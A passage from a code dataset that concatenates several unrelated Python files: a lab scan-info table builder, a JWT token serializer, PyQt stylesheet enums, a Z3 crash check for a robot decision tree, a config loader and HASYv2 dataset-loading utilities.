os\nimport re\nimport pandas as pd\nimport glob\nfrom getanalysisdata import analysisdata\n\n\ndef df_scaninfo(dir_date, para_txt):\n '''Create a dataframe from all the scan data'''\n\n #get column names for the dataframe\n info_key = config_keys(dir_date)\n if len(info_key)==3: #old MC version\n columns = ['Scan', 'Start Info', 'Scan Parameter','Start','End','Shots']\n elif len(info_key)==8:#new MC from May 2020\n columns = ['Scan', 'Start Info', 'Scan Parameter', 'Start', 'End',\n 'Step', 'Shots/step', 'End Info']\n else:\n columns = info_key\n \n #add experimental parameters to the column names \n if para_txt:\n exp_paras = para_txt.replace(\", \", \",\").split(\",\")\n columns = columns+exp_paras\n\n # fill in data\n data = pd.DataFrame(columns=columns)\n last_scan = get_last_scannumber(dir_date)\n for i in range(last_scan):\n info_row = get_scaninfo_row(dir_date, para_txt, i + 1, len(columns))\n data.loc[i] = info_row\n return data\n\ndef config_keys(dir_date, last_scan=10):\n '''Get keys of a ScanInfo(config) file. Look for each scan until finding non-empty one.\n '''\n keys = None\n for i in range(last_scan):\n keys,values = get_scaninfo(dir_date, i+1)\n if keys:\n break\n return keys\n\ndef get_scaninfo_row(dir_date, para_txt, n_scan, len_col):\n '''Get scan info for a scan (n_scan). Return a text of a row to write on a table.'''\n\n #Get basic scan info from scaninfo file\n keys, values = get_scaninfo(dir_date, n_scan)\n if not keys:\n row_list = [n_scan] + ['-'] * (len(len_col) - 1)\n else:\n #Get data from analysis file\n analysis = analysisdata(dir_date, n_scan)\n \n # Say 'No scan' if scan parameter is 'Shotnumber'. \n # Get alias of scan parameter if exists\n if values[2] in 'Shotnumber':\n values[2] = 'No Scan'\n elif analysis.get_par_alias(values[2]):\n values[2] = analysis.get_par_alias(values[2])\n\n for i in range(1,len(values)):\n #replace None with '-'\n if not values[i]:\n values[i] = '-'\n # round up a value to 3 decimal\n elif values[i][0].isdecimal():\n values[i] = str(round(float(values[i][0]), 3))\n \n #in case of old MC version, append additional info\n if len(keys)==3:\n _, n_shot = analysis.get_start_end_val('Shotnumber')\n val_start, val_end = analysis.get_start_end_val(values[2])\n values = values + [val_start, val_end, n_shot]\n\n #get additional experimental parameters\n exp_vals = []\n if para_txt:\n exp_paras = para_txt.replace(\", \", \",\").split(\",\")\n for i in range(len(exp_paras)):\n exp_val = analysis.get_val(exp_paras[i])\n # say 'scan' if this is a scan parameter\n if exp_paras[i] in values[2]:\n exp_val = 'scan'\n exp_vals = exp_vals + [exp_val]\n\n # Make a row of the dataframe\n row_list = values + exp_vals\n\n return row_list\n\n\ndef get_scaninfo(dir_date, n_scan):\n '''Get scan number, scan parameter, scan start info from ScanInfoScan***.ini'''\n scan_3d = '{0:03}'.format(n_scan)\n file_config = dir_date + '\\\\scans\\\\Scan' + scan_3d + '\\\\ScanInfoScan' + scan_3d + '.ini'\n config = ConfigParser()\n config_read = config.read(file_config)\n if config_read:\n keys = list(config['Scan Info'].keys())\n values = [i.strip('\"') for i in config['Scan Info'].values()]\n else:\n keys, values = None, None\n return keys, values\n\n\ndef get_last_scannumber(dir_date):\n '''Get the last scan number which is already done'''\n\n path = dir_date + '\\\\analysis'\n if not os.path.isdir(path):\n return 0\n else:\n # get last scan info file name\n files = glob.glob(path + '\\\\s*info.txt')\n file_last = os.path.basename(files[-1])\n # regexp. find number in the file name\n n_scans = int(re.findall(r\"\\d+\", file_last)[0])\n return n_scans\n\n\ndef get_val(dir_date, n_scan, par):\n \"Get the parameter value of the first shot\"\n file = dir_date + '\\\\analysis\\\\s' + str(n_scan) + '.txt'\n data = pd.read_csv(file, sep='\\t')\n indices = [k for k, s in enumerate(list(data)) if par in s]\n if not indices or data.empty:\n return '-'\n else:\n par_full = list(data)[indices[0]]\n return round(data[par_full].iloc[0], 3)\n\ndef get_start_end_val(dir_date, n_scan, par, isalias=True):\n '''Get the value of the first shot and the last shot. Using this only for the old MC version'''\n\n file = dir_date + '\\\\analysis\\\\s' + str(n_scan) + '.txt'\n data = pd.read_csv(file, sep='\\t')\n indices = [k for k, s in enumerate(list(data)) if par in s]\n if not indices or data.empty:\n if par=='Shotnumber':\n return par, 0, 0\n else:\n return '-', '-', '-'\n else:\n par_full = list(data)[indices[0]]\n val_first, val_end = data[par_full].iloc[0], data[par_full].iloc[-1]\n\n # Get Alias if exists\n if isalias:\n if 'Alias' in par_full:\n par_full = par_full.split('Alias:', 1)[1]\n return par_full, round(val_first, 3), round(val_end, 3)","sub_path":"ScanInfoToGsheet/source/getscaninfo.py","file_name":"getscaninfo.py","file_ext":"py","file_size_in_byte":5358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"605340520","text":"from rest_framework_simplejwt.serializers import TokenObtainPairSerializer\n\n\nISS_DOMAIN = 'koreromaori.com'\n\nclass MiApiObtainPairSerializer(TokenObtainPairSerializer):\n @classmethod\n def get_token(cls, user):\n token = super().get_token(user)\n token['iss'] = ISS_DOMAIN\n token['sub'] = user.username\n token['roles'] = list(\n user\n .user_permissions\n .values_list('codename', flat=True)\n )\n return token\n","sub_path":"corpora/corpora/serializers/jwt_authentication.py","file_name":"jwt_authentication.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"567635503","text":"\"\"\"Collection of enum classes that make life a little easier.\n\nWhen setting style options, it's useful to have a list of available,\ncorrectly spelled strings, which can then be used by the programmer\nwithout having to go look up the available style options.\n\nThese enums were built based on:\n\nhttp://doc.qt.io/qt-5/stylesheet-reference.html#list-of-properties\n\nExample:\n\n.. code-block:: python\n\n # create a stylesheet\n self.style = WidgetStyleSheet(self)\n # set border style without having to worry about spelling.\n self.style.border_style = BorderStyle().dashed\n\n # set animation curve\n # this sets an animation on the border thickness of the current style\n # which goes from 0 to 10 pixels, as integer, in one second, and repeats\n # infinitely. The curve is set to in_quad.\n self.style.border_thickness.add_animation(\n 0, 10, 1, curve=Curve().in_quad, loops=-1)\n\"\"\"\n\n\nfrom PyQt5 import Qt\n\n\nclass TextDecoration():\n \"\"\"TextDecoration.\n\n :ivar none: no text decoration\n :ivar underline: underlined text\n :ivar overline: overlined text\n :ivar line-through: line through text\n \"\"\"\n\n def __init__(self):\n \"\"\"Init.\"\"\"\n self.none = \"none\"\n self.underline = \"underline\"\n self.overline = \"overline\"\n self.line_through = \"line-through\"\n\n\nclass Position():\n \"\"\"Position.\n\n :ivar absolute: absolute positioning.\n :ivar relative: relative positioning.\n \"\"\"\n\n def _init__(self):\n \"\"\"Init.\"\"\"\n self.absolute = \"absolute\"\n self.relative = \"relative\"\n\n\nclass BorderStyle():\n \"\"\"BorderStyle.\n\n :ivar dashed: dashed border style.\n :ivar dot-dash: dot, dash style.\n :ivar dot-dot-dash: dot, dot, dash style.\n :ivar dotted: dotted style.\n :ivar double: double border.\n :ivar groove: grooved border.\n :ivar inset: inset border.\n :ivar outset: outset border.\n :ivar ridge: ridged border.\n :ivar solid: solid border.\n :ivar none: no border.\n \"\"\"\n\n def __init__(self):\n \"\"\"Init.\"\"\"\n self.dashed = \"dashed\"\n self.dot_dash = \"dot-dash\"\n self.dot_dot_dash = \"dot-dot-dash\"\n self.dotted = \"dotted\"\n self.double = \"double\"\n self.groove = \"groove\"\n self.inset = \"inset\"\n self.outset = \"outset\"\n self.ridge = \"ridge\"\n self.solid = \"solid\"\n self.none = \"none\"\n\n\nclass Alignment():\n \"\"\"enum for various alignments.\"\"\"\n\n def __init__(self):\n \"\"\"Init.\"\"\"\n self.top = \"top\"\n self.bottom = \"bottom\"\n self.left = \"left\"\n self.right = \"right\"\n self.center = \"center\"\n\n\nclass Attachment():\n \"\"\"enum for Attachment property.\"\"\"\n\n def __init__(self):\n \"\"\"Init.\"\"\"\n self.scroll = \"scroll\"\n self.fixed = \"fixed\"\n\n\nclass FontStyle():\n \"\"\"enum for Font style property.\"\"\"\n\n def __init__(self):\n \"\"\"Init.\"\"\"\n self.normal = \"normal\"\n self.italic = \"italic\"\n self.oblique = \"oblique\"\n\n\nclass Origin():\n \"\"\"enum for Origin property.\"\"\"\n\n def __init__(self):\n \"\"\"Init.\"\"\"\n self.margin = \"margin\"\n self.border = \"border\"\n self.padding = \"padding\"\n self.content = \"content\"\n\n\nclass PaletteRole():\n \"\"\"enum for Palette Role property.\"\"\"\n\n def __init__(self):\n \"\"\"Init.\"\"\"\n self.alternate_base = \"alternate-base\"\n self.base = \"base\"\n self.bright_text = \"bright-text\"\n self.button = \"button\"\n self.button_text = \"button-text\"\n self.dark = \"dark\"\n self.highlight = \"highlight\"\n self.highlighted_text = \"highlighted-text\"\n self.light = \"light\"\n self.link = \"link\"\n self.link_visited = \"link-visited\"\n self.mid = \"mid\"\n self.midlight = \"midlight\"\n self.shadow = \"shadow\"\n self.text = \"text\"\n self.window = \"window\"\n self.window_text = \"window-text\"\n\n\nclass Repeat():\n \"\"\"enum for the repeat property.\"\"\"\n\n def __init__(self):\n \"\"\"Init.\"\"\"\n self.repeat_x = \"repeat-x\"\n self.repeat_y = \"repeat-y\"\n self.repeat = \"repeat\"\n self.no_repeat = \"no-repeat\"\n\n\nclass Spread():\n \"\"\"enum for gradient spread options.\"\"\"\n\n def __init__(self):\n \"\"\"Init.\"\"\"\n self.pad = \"pad\"\n self.reflect = \"reflect\"\n self.repeat = \"repeat\"\n\n\nclass Curve():\n \"\"\"enum for easing curves.\n\n Provides a shorthand way of accessing curve types.\n\n Available types are listed on:\n http://pyqt.sourceforge.net/Docs/PyQt4/qeasingcurve.html#Type-enum\n \"\"\"\n\n def __init__(self):\n \"\"\"Init.\"\"\"\n self.curve = Qt.QEasingCurve()\n\n self.linear = self.curve.Linear\n\n self.in_quad = self.curve.InQuad\n self.out_quad = self.curve.OutQuad\n self.in_out_quad = self.curve.InOutQuad\n\n self.in_cubic = self.curve.InCubic\n self.out_cubic = self.curve.OutCubic\n self.in_out_cubic = self.curve.InOutCubic\n self.out_in_cubic = self.curve.OutInCubic\n\n self.in_quart = self.curve.InQuart\n self.out_quart = self.curve.OutQuart\n self.in_out_quart = self.curve.InOutQuart\n self.out_in_quart = self.curve.OutInQuart\n\n self.in_quint = self.curve.InQuint\n self.out_quint = self.curve.OutQuint\n self.in_out_quint = self.curve.InOutQuint\n self.out_in_quint = self.curve.OutInQuint\n\n self.in_sine = self.curve.InSine\n self.out_sine = self.curve.OutSine\n self.in_out_sine = self.curve.InOutSine\n self.out_in_sine = self.curve.OutInSine\n\n self.in_expo = self.curve.InExpo\n self.out_expo = self.curve.OutExpo\n self.in_out_expo = self.curve.InOutExpo\n self.out_in_expo = self.curve.OutInExpo\n\n self.in_circ = self.curve.InCirc\n self.out_circ = self.curve.OutCirc\n self.in_out_circ = self.curve.InOutCirc\n self.out_in_circ = self.curve.OutInCirc\n\n self.in_elastic = self.curve.InElastic\n self.out_elastic = self.curve.OutElastic\n self.in_out_elastic = self.curve.InOutElastic\n self.out_in_elastic = self.curve.OutInElastic\n\n self.in_back = self.curve.InBack\n self.out_back = self.curve.OutBack\n self.in_out_back = self.curve.InOutBack\n self.out_in_back = self.curve.OutInBack\n\n self.in_bounce = self.curve.InBounce\n self.out_bounce = self.curve.OutBounce\n self.in_out_bounce = self.curve.InOutBounce\n self.out_in_bounce = self.curve.OutInBounce\n","sub_path":"styledpyqt/StyleOptions.py","file_name":"StyleOptions.py","file_ext":"py","file_size_in_byte":6533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"411709299","text":"#This version of the script supresses the printed output to only know the node number, action (as Z3 variable), \n#and crash determination for the bounds of each node\n\n\nfrom abstract_state_utils import State, StateBounds, StateMapper, TreeInformation\nfrom typing import List\nfrom z3 import *\n\nchild_left = [1, 3, 5, 7, 9, 11, 13, -1, -1, -1, -1, -1, -1, -1, -1]\nchild_right = [2, 4, 6, 8, 10, 12, 14, -1, -1, -1, -1, -1, -1, -1, -1]\nfeature = [0, 2, 7, 10, 25, 39, 60, -1, -1, -1, -1, -1, -1, -1, -1]\nthreshold = [1.0, 0.5, 3, 0.5, 0.5, 0.5, 0.5, -1, -1, -1, -1, -1, -1, -1, -1]\nvalue = [-1, -1, -1, -1, -1, -1, -1, 0, 2, 3, 1, 5, 4, 0, 2]\n\nupper_bound: State = [3.14, 4.0, 5.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,\n 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,1.0, 1.0,\n 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,\n 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0]\n\nlower_bound: State = [-3.14, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]\n\nroot_bounds: StateBounds = StateBounds(state_bound_low=lower_bound, state_bound_high=upper_bound)\n\ntree_info: TreeInformation = TreeInformation(root_state_bounds=root_bounds, child_left=child_left,\n child_right=child_right, feature=feature, threshold=threshold, value=value)\nsm: StateMapper = StateMapper(tree_info)\n\n# This is a list of statebounds. The index of the list corresponds to node number, and the value of this array is the\n# StateBounds for that node\nall_state_bounds: List[StateBounds] = sm.map_abstract_states()\n\n# node = input variable\n\n#print(\"State Bounds For Node 0\")\n#print(all_state_bounds[0])\n#print(\"State Bounds For Node 8\")\n#print(all_state_bounds[8])\n\n# to access the lower or upper bound of node 8, for example do some something like:\n# all_state_bounds[8].sbound_low\n# all_state_bounds[8].sbound_high\n\n\n\n\n## EVERYTHING BELOW THIS IS AUSTIN'S CODE\n\n#Take lower bound and upper bound and run this check on all states within upper and lower bounds. A is action, leaf is node number\ndef test(upper,lower, A, leaf):\n\n all_occupied_1 = []\n all_occupied_2 = []\n\n\n for j in range(3,len(upper)):\n if upper[j] >= 0.5:\n all_occupied_1.append(j)\n \n for j in range(3,len(lower)):\n if lower[j] >= 0.5:\n all_occupied_2.append(j)\n\n# print(\"All occupied cells from Upper\")\n# print(all_occupied_1)\n# print(\"\\n\")\n#\n# print(\"All occupied cells from Lower\")\n# print(all_occupied_2)\n# print(\"\\n\")\n\n\n #build array of the potentially dangerous cells as all true for each action\n danger_forward = [7,17,27,8,18,28]\n danger_for_left = [9,19,29,10,20,30]\n danger_for_right = [5,15,25,6,16,26]\n\n\n #check these elements of input, if they are occupied then store as c_ else store as Not(c_)\n occ_dang_for_right_up = []\n occ_dang_for_up = []\n occ_dang_for_left_up = []\n occ_dang_for_right_low = []\n occ_dang_for_low = []\n occ_dang_for_left_low = []\n\n\n crash_0 = [] # forward right crash\n crash_2 = [] # forward crash\n crash_4 = [] # forward left crash\n\n for i in danger_for_right:\n a = Bools('c%d' % i)\n crash_0.append(a[0])\n\n for i in danger_forward:\n b = Bools('c%d' % i)\n crash_2.append(b[0])\n\n for i in danger_for_left:\n c = Bools('c%d' % i)\n crash_4.append(c[0])\n \n #check these elements of input, if they are occupied then store as c_ else store as Not(c_)\n def filler(danger,occ_upper,occ_lower,upper, lower):\n \n for i in danger:\n if upper[i] >= 0.5:\n filled = Bools('c%d' % i)\n occ_upper.append(filled[0])\n else:\n empty = Bools('c%d' % i)\n occ_upper.append(Not(empty[0]))\n \n# print(\"Upper:\")\n# print(occ_upper)\n \n for i in danger:\n if lower[i] >= 0.5:\n filled = Bools('c%d' % i)\n occ_lower.append(filled[0])\n else:\n empty = Bools('c%d' % i)\n occ_lower.append(Not(empty[0]))\n \n# print(\"Lower:\")\n# print(occ_lower)\n \n return occ_upper,occ_lower\n \n\n def prove(f):\n s = Solver() # if I remove I get an interesting result\n s.add(Not(f))\n if str(s.check()) == 'unsat': #determine sat or unsat\n return \"crash\"\n else:\n return \"safe action\"\n\n \n # If both crash, then definitely crash\n # If only one crashes, may crash in a subspace of the node space\n # If both don't crash, then no crash\n def crash_check(occ_upper,occ_lower,crash):\n \n s = Solver()\n \n def bounds_check(occ):\n for i in range(len(crash)):\n s.push()\n crashing = And(occ[i],crash[i]) == Or(And(occ[i],crash[i]), crash[i])\n check = prove(crashing)\n if str(check) == 'crash':\n return print(\"The robot will crash into an object in cell \" + str(occ[i]))\n s.pop()\n \n return print(\"safe action\")\n \n print(\"Upper Bound check...\")\n bounds_check(occ_upper)\n print(\"\\n\")\n print(\"Lower Bound check...\")\n bounds_check(occ_lower)\n\n return s.check()\n\n\n # \"Potentially dangerous occupied\" means cells in immediate range of causing a crash for a specific action, given the described constraints, any cell outside of this range would be far enough that the robot would be able to recalibrate and make a \"safer\" decision\n\n \n if str(A) == 'a0':\n #print(\"Cells that will cause a crash if Action 0\")\n #print(crash_0)\n #print(\"\\n\")\n # print(\"Currently occupied potentially dangerous cells if action = 0 for node \" + str(leaf))\n filler(danger_for_right,occ_dang_for_right_up,occ_dang_for_right_low,upper,lower) #action 0\n #print(\"\\n\")\n crash_check(occ_dang_for_right_up,occ_dang_for_right_low, crash_0)\n\n\n elif str(A) == 'a2':\n # print(\"Cells that will cause a crash if Action 2\")\n #print(crash_2)\n #print(\"\\n\")\n #print(\"Currently occupied potentially dangerous cells if action = 2 for node \" + str(leaf))\n filler(danger_forward,occ_dang_for_up,occ_dang_for_low, upper, lower) #action 2\n #print(\"\\n\")\n crash_check(occ_dang_for_up, occ_dang_for_low, crash_2)\n\n \n\n elif str(A) == 'a4':\n # print(\"Cells that will cause a crash if Action 4\")\n #print(crash_4)\n #print(\"\\n\")\n #print(\"Currently occupied potentially dangerous cells if action = 4 for node \" + str(leaf))\n filler(danger_for_right,occ_dang_for_left_up, occ_dang_for_left_low, upper, lower) #action 4\n #print(\"\\n\")\n crash_check(occ_dang_for_left_up,occ_dang_for_left_low, crash_4)\n\n else:\n print(\"safe action\")\n\n\n return\n\n\n\nact = [Int('a%s' % i) for i in range(6)]\n\n#print A #a0, a1, a2, a3, a4, a5, a6\n\n##action a0 = forward and right\n##action a2 = forward\n##action a2 = forward and left\n\n#0 forward right\n#1 rotate right\n#2 forward\n#3 stop\n#4 forward left\n#5 rotate left\n\nnodes = []\n\nfor i in range(len(value)):\n if value[i] != -1:\n nodes.append(i) #get inidices of nodes to be used later in loop to check for crash at each node\n\n# print(nodes)\n\n# Determine which leaf nodes have bounds that will or will not result in a crash\nfor node in nodes:\n print(\"Checking Node \" + str(node) + \"...\\n\")\n print(\"Action from Node \" + str(node) + \":\")\n print(act[value[node]])\n print(\"\\n\")\n# A.append(act[value[leaf]]) #don't do this until I am running final function\n# print(\"Upper Bound of Node \" + str(node) + \"...\\n\")\n# print(all_state_bounds[node].sbound_high)\n# print(\"\\n\")\n# print(\"Lower Bound of Node \" + str(node) + \"...\\n\")\n# print(all_state_bounds[node].sbound_low)\n# print(\"\\n\")\n test(all_state_bounds[node].sbound_high, all_state_bounds[node].sbound_low, act[value[node]], node)\n print(\"\\n \\n \\n \\n \\n \\n\")\n","sub_path":"Crash_Check_Supressed.py","file_name":"Crash_Check_Supressed.py","file_ext":"py","file_size_in_byte":8623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"299595775","text":"import json\nimport os\nimport pkgutil\nfrom .io import load_file\nfrom datasmart.core import global_config\n\n\ndef load_config(module_name: tuple, filename='config.json', load_json=True):\n \"\"\" load the config file for this module.\n\n It will perform the following steps:\n\n 1. get the config file ``config/{os.sep.join(module_name)}/config.json``, where ``/`` is ``\\`` for Windows,\n under the directory consisting the invoked Python script.\n 2. if the above step fails, load the default one provided by the module.\n\n\n :param filename: which file to load. by default, ``config.json``.\n :param module_name: module name as a list of strings, \"AA.BB\" is represented as ``[\"AA\",\"BB\"]``\n :param load_json: whether parse the string as JSON or not.\n :return: the JSON object of the module config file, or the raw string.\n \"\"\"\n path_list = (global_config['project_root'], 'config') + module_name + (filename,)\n config_path = os.path.join(*path_list)\n path_list_global = (os.path.expanduser('~'), '.datasmart', 'config') + module_name + (filename,)\n config_path_global = os.path.join(*path_list_global)\n a = os.path.exists(config_path)\n b = os.path.exists(config_path_global)\n if a or b:\n if a:\n # step 1. load config in current project.\n file_to_use = config_path\n else:\n # step 2. load config in ~/.datasmart\n file_to_use = config_path_global\n\n config = load_file(file_to_use, load_json=False)\n else:\n # step 3. load default config\n config = pkgutil.get_data(\n global_config['root_package_spec'] + '.config.' + '.'.join(module_name), filename).decode()\n if load_json:\n config = json.loads(config)\n return config\n","sub_path":"datasmart/core/util/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"167613577","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nTools for the HASY dataset.\n\nType `./hasy_tools.py --help` for the command line tools and `help(hasy_tools)`\nin the interactive Python shell for the module options of hasy_tools.\n\nSee https://arxiv.org/abs/1701.08380 for details about the dataset.\n\"\"\"\n\nimport logging\nimport csv\nimport json\nimport os\nimport random\nrandom.seed(0) # make sure results are reproducible\nfrom PIL import Image, ImageDraw\nimport sys\nfrom six.moves import urllib\nimport hashlib\nfrom sklearn.model_selection import train_test_split\n\nimport numpy as np\nnp.random.seed(0) # make sure results are reproducible\nimport scipy.ndimage\nimport matplotlib.pyplot as plt\ntry:\n from urllib.request import urlretrieve # Python 3\nexcept ImportError:\n from urllib import urlretrieve # Python 2\nfrom six.moves.urllib.error import URLError\nfrom six.moves.urllib.error import HTTPError\nimport tarfile\nimport shutil\nfrom six.moves import cPickle as pickle\n\nlogging.basicConfig(format='%(asctime)s %(levelname)s %(message)s',\n level=logging.INFO,\n stream=sys.stdout)\n\n__version__ = \"v2.4\"\n\nn_classes = 369\nlabels = []\nWIDTH = 32\nHEIGHT = 32\nimg_rows = 32\nimg_cols = 32\nimg_channels = 1\nsymbol_id2index = None\n\n\ndef _load_csv(filepath, delimiter=',', quotechar=\"'\"):\n \"\"\"\n Load a CSV file.\n\n Parameters\n ----------\n filepath : str\n Path to a CSV file\n delimiter : str, optional\n quotechar : str, optional\n\n Returns\n -------\n list of dicts : Each line of the CSV file is one element of the list.\n \"\"\"\n data = []\n csv_dir = os.path.dirname(filepath)\n with open(filepath, 'r') as csvfile:\n reader = csv.DictReader(csvfile,\n delimiter=delimiter,\n quotechar=quotechar)\n for row in reader:\n for el in ['path', 'path1', 'path2']:\n if el in row:\n row[el] = os.path.abspath(os.path.join(csv_dir, row[el]))\n data.append(row)\n return data\n\n\ndef generate_index(csv_filepath):\n \"\"\"\n Generate an index 0...k for the k labels.\n\n Parameters\n ----------\n csv_filepath : str\n Path to 'test.csv' or 'train.csv'\n\n Returns\n -------\n tuple of dict and a list\n dict : Maps a symbol_id as in test.csv and\n train.csv to an integer in 0...k, where k is the total\n number of unique labels.\n list : LaTeX labels\n \"\"\"\n symbol_id2index = {}\n data = _load_csv(csv_filepath)\n i = 0\n labels = []\n for item in data:\n if item['symbol_id'] not in symbol_id2index:\n symbol_id2index[item['symbol_id']] = i\n labels.append(item['latex'])\n i += 1\n return symbol_id2index, labels\n\n\ndef _validate_file(fpath, md5_hash):\n \"\"\"\n Validate a file against a MD5 hash.\n\n Parameters\n ----------\n fpath: string\n Path to the file being validated\n md5_hash: string\n The MD5 hash being validated against\n\n Returns\n ---------\n bool\n True, if the file is valid. Otherwise False.\n \"\"\"\n hasher = hashlib.md5()\n with open(fpath, 'rb') as f:\n buf = f.read()\n hasher.update(buf)\n if str(hasher.hexdigest()) == str(md5_hash):\n return True\n else:\n return False\n\n\ndef _get_file(fname, origin, md5_hash=None, cache_subdir='~/.datasets'):\n \"\"\"\n Download a file from a URL if it not already in the cache.\n\n Passing the MD5 hash will verify the file after download\n as well as if it is already present in the cache.\n\n Parameters\n ----------\n fname: name of the file\n origin: original URL of the file\n md5_hash: MD5 hash of the file for verification\n cache_subdir: directory being used as the cache\n\n Returns\n -------\n Path to the downloaded file\n \"\"\"\n datadir_base = os.path.expanduser(\"~/.datasets\")\n if not os.path.exists(datadir_base):\n os.makedirs(datadir_base)\n if not os.access(datadir_base, os.W_OK):\n logging.warning(\"Could not access {}.\".format(cache_subdir))\n datadir_base = os.path.join('/tmp', '.data')\n datadir = os.path.join(datadir_base, cache_subdir)\n if not os.path.exists(datadir):\n os.makedirs(datadir)\n\n fpath = os.path.join(datadir, fname)\n\n download = False\n if os.path.exists(fpath):\n # File found; verify integrity if a hash was provided.\n if md5_hash is not None:\n if not _validate_file(fpath, md5_hash):\n print('A local file was found, but it seems to be '\n 'incomplete or outdated.')\n download = True\n else:\n download = True\n\n if download:\n print('Downloading data from {} to {}'.format(origin, fpath))\n error_msg = 'URL fetch failure on {}: {} -- {}'\n try:\n try:\n urlretrieve(origin, fpath)\n except URLError as e:\n raise Exception(error_msg.format(origin, e.errno, e.reason))\n except HTTPError as e:\n raise Exception(error_msg.format(origin, e.code, e.msg))\n except (Exception, KeyboardInterrupt) as e:\n if os.path.exists(fpath):\n os.remove(fpath)\n raise\n return fpath\n\n\ndef load_data(mode='fold-1', image_dim_ordering='tf'):\n \"\"\"\n Load HASYv2 dataset.\n\n Parameters\n ----------\n mode : string, optional (default: \"complete\")\n - \"complete\" : Returns {'x': x, 'y': y} with all labeled data\n - \"fold-1\": Returns {'x_train': x_train,\n 'y_train': y_train,\n 'x_test': x_test,\n 'y_test': y_test}\n - \"fold-2\", ..., \"fold-10\": See \"fold-1\"\n - \"verification\": Returns {'train': {'x_train': List of loaded images,\n 'y_train': list of labels},\n 'test-v1': {'X1s': List of first images,\n 'X2s': List of second images,\n 'ys': List of labels\n 'True' or 'False'}\n 'test-v2': {'X1s': List of first images,\n 'X2s': List of second images,\n 'ys': List of labels\n 'True' or 'False'}\n 'test-v3': {'X1s': List of first images,\n 'X2s': List of second images,\n 'ys': List of labels\n 'True' or 'False'}}\n image_dim_ordering : 'th' for theano or 'tf' for tensorflow (default: 'tf')\n\n Returns\n -------\n dict\n See \"mode\" parameter for details.\n\n All 'x..' keys contain a uint8 numpy array [index, y, x, depth] (or\n [index, depth, y, x] for image_dim_ordering='t')\n\n All 'y..' keys contain a 2D uint8 numpy array [[label]]\n\n \"\"\"\n # Download if not already done\n fname = 'HASYv2.tar.bz2'\n origin = 'https://zenodo.org/record/259444/files/HASYv2.tar.bz2'\n fpath = _get_file(fname, origin=origin,\n md5_hash='fddf23f36e24b5236f6b3a0880c778e3',\n cache_subdir='HASYv2')\n path = os.path.dirname(fpath)\n\n # Extract content if not already done\n untar_fpath = os.path.join(path, \"HASYv2\")\n if not os.path.exists(untar_fpath):\n print('Extract contents from archive...')\n tfile = tarfile.open(fpath, 'r:bz2')\n try:\n tfile.extractall(path=untar_fpath)\n except (Exception, KeyboardInterrupt) as e:\n if os.path.exists(untar_fpath):\n if os.path.isfile(untar_fpath):\n os.remove(untar_fpath)\n else:\n shutil.rmtree(untar_fpath)\n raise\n tfile.close()\n\n # Create pickle if not already done\n pickle_fpath = os.path.join(untar_fpath, \"hasy-data.pickle\")\n if not os.path.exists(pickle_fpath):\n # Load mapping from symbol names to indices\n symbol_csv_fpath = os.path.join(untar_fpath, \"symbols.csv\")\n symbol_id2index, labels = generate_index(symbol_csv_fpath)\n globals()[\"labels\"] = labels\n globals()[\"symbol_id2index\"] = symbol_id2index\n\n # Load data\n data_csv_fpath = os.path.join(untar_fpath, \"hasy-data-labels.csv\")\n data_csv = _load_csv(data_csv_fpath)\n x_compl = np.zeros((len(data_csv), 1, WIDTH, HEIGHT), dtype=np.uint8)\n y_compl = []\n s_compl = []\n path2index = {}\n\n # Load HASYv2 data\n for i, data_item in enumerate(data_csv):\n fname = os.path.join(untar_fpath, data_item['path'])\n s_compl.append(fname)\n x_compl[i, 0, :, :] = scipy.ndimage.imread(fname,\n flatten=False,\n mode='L')\n label = symbol_id2index[data_item['symbol_id']]\n y_compl.append(label)\n path2index[fname] = i\n y_compl = np.array(y_compl, dtype=np.int64)\n\n data = {'x': x_compl,\n 'y': y_compl,\n 's': s_compl,\n 'labels': labels,\n 'path2index': path2index}\n\n # Store data as pickle to speed up later calls\n with open(pickle_fpath, 'wb') as f:\n pickle.dump(data, f, protocol=pickle.HIGHEST_PROTOCOL)\n else:\n with open(pickle_fpath, 'rb') as f:\n data = pickle.load(f)\n globals()[\"labels\"] = data['labels']\n\n labels = data['labels']\n x_compl = data['x']\n y_compl = np.reshape(data['y'], (len(data['y']), 1))\n s_compl = data['s']\n path2index = data['path2index']\n\n if image_dim_ordering == 'tf':\n x_compl = x_compl.transpose(0, 2, 3, 1)\n\n if mode == 'complete':\n return {'x': x_compl, 'y': y_compl}\n elif mode.startswith('fold-'):\n fold = int(mode.split(\"-\")[1])\n if fold < 1 or fold > 10:\n raise NotImplementedError\n\n # Load fold\n fold_dir = os.path.join(untar_fpath,\n 